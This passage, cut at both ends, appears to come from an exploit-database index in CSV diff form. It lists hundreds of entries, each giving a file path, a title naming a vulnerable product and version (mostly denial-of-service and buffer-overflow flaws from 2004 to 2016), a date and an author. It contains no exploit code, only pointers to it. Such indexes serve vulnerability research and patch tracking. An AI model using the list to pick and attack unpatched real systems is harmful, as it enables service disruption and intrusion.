Overflow",2004-04-30,"Slotto Corleone",dos,multiple, +24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,dos,linux, +24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,dos,windows, +24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",dos,linux, +24096,exploits/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",dos,linux, +24103,exploits/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",dos,windows, +24107,exploits/windows/dos/24107.pl,"EMule Web 0.42 Control Panel - Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",dos,windows, +24110,exploits/windows/dos/24110.py,"Serva 2.0.0 - DNS Server QueryName Remote Denial of Service",2013-01-14,"Julien Ahrens",dos,windows, +24111,exploits/windows/dos/24111.py,"Serva 2.0.0 - HTTP Server GET Remote Denial of Service",2013-01-14,"Julien Ahrens",dos,windows, +24112,exploits/windows/dos/24112.txt,"Microsoft Internet Explorer 6 - XML Parsing Denial of Service",2004-05-10,"Rafel Ivgi The-Insider",dos,windows, +24119,exploits/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 - http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",dos,windows, +24128,exploits/windows/dos/24128.txt,"ActivePerl 5.x / Cygwin 1.5.x - System Function Call Buffer Overflow",2004-05-18,"Oliver Karow",dos,windows, +24130,exploits/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",dos,multiple, +24135,exploits/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,dos,windows, +24142,exploits/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,dos,windows, +24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,dos,hardware, +24144,exploits/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows, +24145,exploits/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)",2004-05-25,badpack3t,dos,windows, +24146,exploits/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)",2004-06-02,CoolICE,dos,windows, +24147,exploits/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)",2004-06-02,CoolICE,dos,windows, +24150,exploits/windows/dos/24150.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Buffer Overflow",2004-05-28,"Chintan Trivedi",dos,windows, +40399,exploits/windows/dos/40399.txt,"VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions",2016-09-19,"Google Security Research",dos,windows, +24170,exploits/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",dos,multiple, +24178,exploits/windows/dos/24178.txt,"ToCA Race Driver - Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",dos,windows, +24181,exploits/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service",2004-06-08,"Thomas Walpuski",dos,openbsd, +24195,exploits/windows/dos/24195.pl,"WinAgents TFTP Server 3.0 - Remote Buffer Overrun",2004-06-11,"Ziv Kamir",dos,windows, +24208,exploits/windows/dos/24208.c,"FreeIPS 1.0 Protected Service - Denial of Service",2004-06-14,shawnwebb@softhome.net,dos,windows, +24209,exploits/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service",2004-06-14,"Tan Chew Keong",dos,windows, +24211,exploits/windows/dos/24211.txt,"Microsoft Internet Explorer 6 - HREF Save As Denial of Service",2004-06-15,"Rafel Ivgi The-Insider",dos,windows, +24222,exploits/linux/dos/24222.c,"ircd-hybrid 7.0.1 / ircd-ratbox 1.5.1/2.0 - Socket Dequeuing Denial of Service",2004-06-19,"Erik Sperling Johansen",dos,linux, +24233,exploits/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - 'execve()' Unaligned Memory Access Denial of Service",2004-06-23,"Marceta Milos",dos,freebsd, +24242,exploits/multiple/dos/24242.java,"Sun Java Runtime Environment 1.4.x - Font Object Assertion Failure Denial of Service",2004-06-28,"Marc Schoenefeld",dos,multiple, +24243,exploits/unix/dos/24243.txt,"IBM Lotus Domino Server 6 - Web Access Remote Denial of Service",2004-06-30,"Andreas Klein",dos,unix, +24247,exploits/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",dos,multiple, +24248,exploits/unix/dos/24248.txt,"IBM Websphere Caching Proxy Server 5.0 2 - Denial of Service",2004-07-02,"Leandro Meiners",dos,unix, +24267,exploits/windows/dos/24267.txt,"Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",dos,windows, +24275,exploits/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",dos,unix, +24281,exploits/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,dos,windows, +24282,exploits/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl?Language' CPU Consumption (Denial of Service)",2004-07-15,dr_insane,dos,multiple, +24283,exploits/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - Denial of Service",2004-07-15,dr_insane,dos,multiple, +24288,exploits/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,dos,windows, +40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",dos,windows, +24305,exploits/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,dos,multiple, +24319,exploits/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,dos,windows, +24343,exploits/windows/dos/24343.txt,"MailEnable 1.1x - Content-Length Denial of Service",2004-07-30,CoolICE,dos,windows, +24344,exploits/hardware/dos/24344.txt,"U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service",2004-08-02,"Albert Puigsech Galicia",dos,hardware, +24346,exploits/linux/dos/24346.txt,"Mozilla 1.x / Netscape 7.0/7.1 - SOAP Integer Overflow",2004-08-02,zen-parse,dos,linux, +24351,exploits/multiple/dos/24351.c,"Free Web Chat Initial Release - UserManager.java Null Pointer Denial of Service",2004-08-04,"Donato Ferrante",dos,multiple, +24352,exploits/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation Denial of Service",2004-08-04,"Donato Ferrante",dos,multiple, +24355,exploits/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",dos,linux, +24358,exploits/linux/dos/24358.txt,"Xine-Lib 0.99 - Remote Buffer Overflow",2004-07-08,c0ntex,dos,linux, +24360,exploits/linux/dos/24360.py,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)",2004-08-09,"Juan Pablo Martinez Kuhn",dos,linux, +24362,exploits/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",dos,windows, +24386,exploits/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow",2004-07-20,"Matthias Bethke",dos,multiple, +24388,exploits/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow",2004-08-20,Dimetrius,dos,multiple, +24394,exploits/multiple/dos/24394.txt,"Opera Web Browser 7.23 - JavaScript Denial of Service",2004-08-21,sourvivor,dos,multiple, +24395,exploits/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0 / Firefox 0.8/0.9.x - JavaScript Denial of Service",2004-08-23,MeFakon,dos,windows, +24411,exploits/windows/dos/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service",2004-08-25,"Next Generation Security",dos,windows, +24412,exploits/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service",2004-08-25,Uz4yh4N,dos,windows, +24416,exploits/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service",2004-08-30,lion,dos,windows, +24423,exploits/multiple/dos/24423.txt,"Cerbere Proxy Server 1.2 - Long Host Header Field Remote Denial of Service",2004-09-01,"GSS IT",dos,multiple, +24426,exploits/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,dos,windows, +24437,exploits/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",dos,windows, +24448,exploits/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,dos,windows, +24450,exploits/freebsd/dos/24450.txt,"FreeBSD 9.1 - 'ftpd' Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",dos,freebsd, +24463,exploits/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",dos,windows, +24468,exploits/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,dos,windows, +24511,exploits/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",dos,windows, +24474,exploits/windows/dos/24474.py,"Schneider Electric Accutech Manager - Heap Overflow (PoC)",2013-02-10,"Evren Yalçın",dos,windows, +24485,exploits/windows/dos/24485.txt,"Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)",2013-02-11,0vercl0k,dos,windows, +24486,exploits/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,dos,multiple, +24487,exploits/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,dos,linux, +24556,exploits/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,dos,windows, +24569,exploits/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",dos,linux, +24634,exploits/windows/dos/24634.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)",2004-09-27,Coolio,dos,windows, +24580,exploits/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service",2013-03-05,"Marc Heuse",dos,windows, +24586,exploits/windows/dos/24586.txt,"Gearbox Software Halo Combat Evolved 1.x - Game Server Remote Denial of Service",2004-09-09,"Luigi Auriemma",dos,windows, +24590,exploits/linux/dos/24590.txt,"Apache mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. _Alex_ Hankins",dos,linux, +24592,exploits/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,dos,multiple, +24593,exploits/unix/dos/24593.txt,"QNX Photon phrelay-cfg - '-s' Overflow",2004-09-13,"Julio Cesar Fort",dos,unix, +24594,exploits/unix/dos/24594.txt,"QNX Photon phlocale - '-s' Overflow",2004-09-13,"Julio Cesar Fort",dos,unix, +24595,exploits/unix/dos/24595.txt,"QNX Photon input-cfg - '-s' Overflow",2004-09-13,"Julio Cesar Fort",dos,unix, +24596,exploits/unix/dos/24596.txt,"QNX Photon pkg-installer - '-s' Overflow",2004-09-13,"Julio Cesar Fort",dos,unix, +24597,exploits/multiple/dos/24597.txt,"Mozilla Browser 1.7.x - Non-ASCII Hostname Heap Overflow",2004-09-14,"Mats Palmgren & Gael Delalleau",dos,multiple, +24599,exploits/linux/dos/24599.txt,"CUPS 1.1.x - UDP Packet Remote Denial of Service",2004-09-15,"Alvaro Martinez Echevarria",dos,linux, +24605,exploits/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service",2004-09-16,"Jason Summers",dos,windows, +24610,exploits/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",dos,multiple, +24618,exploits/windows/dos/24618.c,"Impressions Games Lords of the Realm III - Nickname Remote Denial of Service",2004-09-20,"Luigi Auriemma",dos,windows, +24619,exploits/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass / Denial of Service",2004-09-21,"James Bercegay",dos,cgi, +24620,exploits/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 - Illegal Character Remote Denial of Service",2004-09-21,"Luigi Auriemma",dos,windows, +24621,exploits/php/dos/24621.txt,"Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service",2004-09-21,"Marc Ruef",dos,php, +24635,exploits/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (2)",2004-09-27,Coolio,dos,windows, +24636,exploits/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (3)",2004-09-27,"Ken Hollis",dos,windows, +24637,exploits/windows/dos/24637.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (4)",2004-09-27,"Ken Hollis",dos,windows, +24639,exploits/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (1)",2004-09-28,"securma massine",dos,windows, +24640,exploits/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service (2)",2004-09-28,"Sebastien Tricaud",dos,windows, +24668,exploits/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service",2004-10-07,"Luigi Auriemma",dos,multiple, +24677,exploits/linux/dos/24677.txt,"IBM DB2 DTS To String Conversion - Denial of Service",2004-09-01,"Chris Anley",dos,linux, +24679,exploits/windows/dos/24679.txt,"IBM DB2 Semaphore Signaling - Denial of Service",2004-09-01,"Chris Anley",dos,windows, +24684,exploits/windows/dos/24684.txt,"Yak! Chat Client 2.x - FTP Server Directory Traversal",2004-10-15,"Luigi Auriemma",dos,windows, +24691,exploits/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service",2004-10-19,"Luigi Auriemma",dos,multiple, +24696,exploits/linux/dos/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)",2004-11-21,"Richard Hart",dos,linux, +24699,exploits/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,dos,windows, +24705,exploits/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",dos,windows, +24708,exploits/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",dos,windows, +24710,exploits/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",dos,multiple, +24715,exploits/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",dos,multiple, +24726,exploits/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",dos,windows, +24733,exploits/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",dos,windows, +24738,exploits/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,dos,windows, +24741,exploits/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,dos,windows, +24743,exploits/windows/dos/24743.txt,"Cam2pc 4.6.2 - '.BMP' Image Processing Integer Overflow",2013-03-13,coolkaveh,dos,windows, +24747,exploits/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",dos,linux, +24755,exploits/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",dos,linux, +24756,exploits/linux/dos/24756.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",dos,linux, +24761,exploits/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",dos,multiple, +24763,exploits/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",dos,multiple, +24854,exploits/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local/Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",dos,php, +24770,exploits/windows/dos/24770.py,"Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities",2004-11-24,icbm,dos,windows, +24775,exploits/windows/dos/24775.html,"Microsoft Internet Explorer 6 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",dos,windows, +24776,exploits/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",dos,windows, +24777,exploits/linux/dos/24777.txt,"Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure",2004-11-25,"Florian Heinz",dos,linux, +24778,exploits/multiple/dos/24778.html,"Sun Java Applet 1.x - Invocation Version Specification",2004-11-25,"Peter Greenwood",dos,multiple, +24780,exploits/osx/dos/24780.html,"Apple Safari Web Browser 1.x - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",dos,osx, +24781,exploits/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",dos,multiple, +24812,exploits/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash (PoC)",2013-03-15,metacom,dos,windows, +24788,exploits/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash (PoC)",2013-03-15,"John Cobb",dos,windows, +24793,exploits/multiple/dos/24793.txt,"JanaServer 2 - Multiple Remote Denial of Service Vulnerabilities",2004-11-30,"Luigi Auriemma",dos,multiple, +24799,exploits/multiple/dos/24799.txt,"Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service",2004-12-06,"Niek van der Maas",dos,multiple, +24804,exploits/linux/dos/24804.c,"Linux Kernel 2.6.x - 'AIO_Free_Ring' Local Denial of Service",2004-12-07,"Darrick J. Wong",dos,linux, +24805,exploits/multiple/dos/24805.txt,"MySQL MaxDB 7.5 - WAHTTP Server Remote Denial of Service",2004-12-07,"Evgeny Demidov",dos,multiple, +24807,exploits/multiple/dos/24807.txt,"MD5 - Message Digest Algorithm Hash Collision",2004-12-07,"Dan Kaminsky",dos,multiple, +24809,exploits/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,dos,multiple, +24815,exploits/linux/dos/24815.txt,"Gamespy Software Development Kit - CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",dos,linux, +24818,exploits/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle - Remote Denial of Service",2004-12-13,"Luigi Auriemma",dos,multiple, +24828,exploits/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",dos,linux, +24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",dos,hardware, +24841,exploits/windows/dos/24841.txt,"Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String",2004-12-14,"Greg MacManus",dos,windows, +24843,exploits/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,dos,osx, +24855,exploits/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local/Remote Vulnerabilities (2)",2004-12-15,Slythers,dos,php, +24865,exploits/linux/dos/24865.txt,"GnuTLS libgnutls - Double-Free Certificate List Parsing Remote Denial of Service",2013-03-22,"Shawn the R0ck",dos,linux, +24866,exploits/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,dos,hardware, +24880,exploits/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,dos,windows, +24896,exploits/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",dos,hardware, +24917,exploits/windows/dos/24917.py,"Easy DVD Player 3.5.1 - libav 'libavcodec_plugin.dll' Denial of Service",2013-04-05,metacom,dos,windows, +24918,exploits/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,dos,windows, +24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",dos,windows, +24930,exploits/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - '.mp3' Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",dos,windows, +27433,exploits/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 - Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",dos,windows, +24968,exploits/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,dos,windows,514 +24951,exploits/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,dos,linux, +24952,exploits/windows/dos/24952.py,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service",2013-04-12,xis_one,dos,windows,69 +24962,exploits/windows/dos/24962.txt,"Foxit Reader 5.4.3.x < 5.4.5.0124 - PDF XREF Parsing Denial of Service",2013-04-18,FuzzMyApp,dos,windows, +24966,exploits/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",dos,windows, +24972,exploits/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String",2013-04-22,Kurono,dos,windows, +25004,exploits/linux/dos/25004.txt,"QwikMail 0.3 - HELO Command Buffer Overflow",2004-12-15,"Jonathan Rockway",dos,linux, +25007,exploits/windows/dos/25007.txt,"Convex 3D 0.8 - Buffer Overflow",2004-12-16,"Ariel Berkman",dos,windows, +25012,exploits/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 - Resource Limit Denial of Service",2004-12-11,"Bartlomiej Sieka",dos,windows, +25017,exploits/linux/dos/25017.txt,"UML_Utilities User-Mode Linux - uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service",2004-12-15,"Danny Lungstrom",dos,linux, +25046,exploits/linux/dos/25046.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (1)",2004-12-22,"Marcin Zgorecki",dos,linux, +25047,exploits/linux/dos/25047.c,"Snort 2.1/2.2 - DecodeTCPOptions Remote Denial of Service (2)",2004-12-22,Antimatt3r,dos,linux, +25056,exploits/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",dos,multiple, +25061,exploits/windows/dos/25061.txt,"NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",dos,windows, +25063,exploits/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,dos,windows, +25070,exploits/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",dos,linux, +25075,exploits/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",dos,multiple, +25076,exploits/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,dos,linux, +25077,exploits/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",dos,linux, +25081,exploits/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",dos,multiple, +25082,exploits/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Denial of Service",2005-02-03,"laurent oudot",dos,hardware, +25083,exploits/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",dos,windows, +25085,exploits/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",dos,windows, +25107,exploits/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - IP Address Local Memory Access",2005-02-16,"Wang Ning",dos,hardware, +25124,exploits/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,dos,hardware, +25128,exploits/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,dos,windows, +25135,exploits/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - 'Date' Cross-Site Scripting",2013-05-01,demonalex,dos,windows, +25140,exploits/windows/dos/25140.txt,"WPS Office - 'Wpsio.dll' Stack Buffer Overflow",2013-05-01,Zhangjiantao,dos,windows, +25164,exploits/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",dos,linux, +25165,exploits/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,dos,multiple, +25171,exploits/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",dos,multiple, +40819,exploits/linux/dos/40819.c,"Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",dos,linux, +40820,exploits/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,dos,windows, +25218,exploits/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service Vulnerabilities",2005-03-05,ports,dos,windows, +25219,exploits/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,dos,windows, +25231,exploits/windows/dos/25231.txt,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",dos,windows, +25234,exploits/linux/dos/25234.sh,"Linux Kernel 2.4.x/2.6.x - Multiple ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",dos,linux, +25255,exploits/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",dos,windows, +25259,exploits/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,dos,windows, +25268,exploits/windows/dos/25268.txt,"Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",dos,windows, +25277,exploits/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router - Remote Denial of Service",2005-03-25,"Chris Rock",dos,hardware, +25281,exploits/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,dos,windows, +25287,exploits/linux/dos/25287.c,"Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC)",2005-03-28,"ilja van sprundel",dos,linux, +25295,exploits/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",dos,hardware, +25303,exploits/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",dos,linux, +25322,exploits/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,dos,linux, +25326,exploits/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",dos,windows, +25329,exploits/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",dos,windows, +25334,exploits/linux/dos/25334.txt,"Mozilla Suite/Firefox - JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",dos,linux, +25353,exploits/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service - Remote Denial of Service",2005-04-06,anonymous,dos,unix, +25363,exploits/windows/dos/25363.py,"Lan Messenger - sending PM 'UNICODE' Overwrite Buffer Overflow (SEH)",2013-05-11,ariarat,dos,windows, +25364,exploits/windows/dos/25364.txt,"AN 